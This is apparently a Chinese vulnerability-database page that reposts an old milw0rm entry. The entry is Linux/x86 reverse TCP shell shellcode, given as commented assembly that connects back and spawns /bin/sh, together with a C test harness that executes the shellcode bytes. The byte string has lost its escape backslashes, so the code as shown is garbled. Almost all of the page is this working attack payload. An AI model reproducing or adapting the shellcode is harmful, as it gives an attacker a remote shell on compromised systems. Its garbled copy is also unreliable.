Linux/x86 – Reverse (/TCP) Shell (/bin/sh) Shellcode (120 bytes)
| 漏洞ID | 1054656 | 漏洞类型 | |
| 发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
![图片[1]-Linux/x86 – Reverse (/TCP) Shell (/bin/sh) Shellcode (120 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Linux/x86 – Reverse (/TCP) Shell (/bin/sh) Shellcode (120 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Connecting shellcode written by lamagra <[email protected]>
http://lamagra.seKure.de
May 2000
.file "connect"
.version "01.01"
.text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx # socket()
movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp) # 2 = AF_INET
decl %ebx # 1 = SYS_socket
movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
leal -12(%ebp),%ecx # put args in correct place
int $0x80 # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp) # save the fd
# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp) # 2 = PF_INET
movw $9999,-18(%ebp) # 9999 = htons(3879);
movl $0x100007f,-16(%ebp) # htonl(IP)
leal -20(%ebp),%eax # struct sockaddr
movl %eax,-8(%ebp) # load the struct
movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
movl %edx,%eax # 102 = socketcall
incl %ebx # 3 = SYS_connect
leal -12(%ebp),%ecx # put args in place
int $0x80 # call socketcall()
# dup2(fd,0-1-2)
xorl %ecx,%ecx
movb $63,%eax # 63 = dup2()
int $0x80
incl %ecx
cmpl $3,%ecx
jne -0xa
# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/
#define NAME "connecting"
char code[]=
"x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
"x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
"x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27xc7x45xf0"
"x7fx01x01x01x8dx45xecx89x45xf8xc6x45xfcx10x89xd0"
"x43x8dx4dxf4xcdx80x31xc9xb0x3fxcdx80x41x83xf9x03"
"x75xf6xebx18x5ex89x75x08x31xc0x88x46x07x89x45x0c"
"xb0x0bx89xf3x8dx4dx08x8dx55x0cxcdx80xe8xe3xffxff"
"xff/bin/sh";
main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcodentSize = %dn",NAME,strlen(code));
(int)(*funct)();
}
// milw0rm.com [2004-09-26]相关推荐: Microsoft Windows DNS Resource Record Cache Corruption Vulnerability
Microsoft Windows DNS Resource Record Cache Corruption Vulnerability 漏洞ID 1102957 漏洞类型 Failure to Handle Exceptional Conditions 发布…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666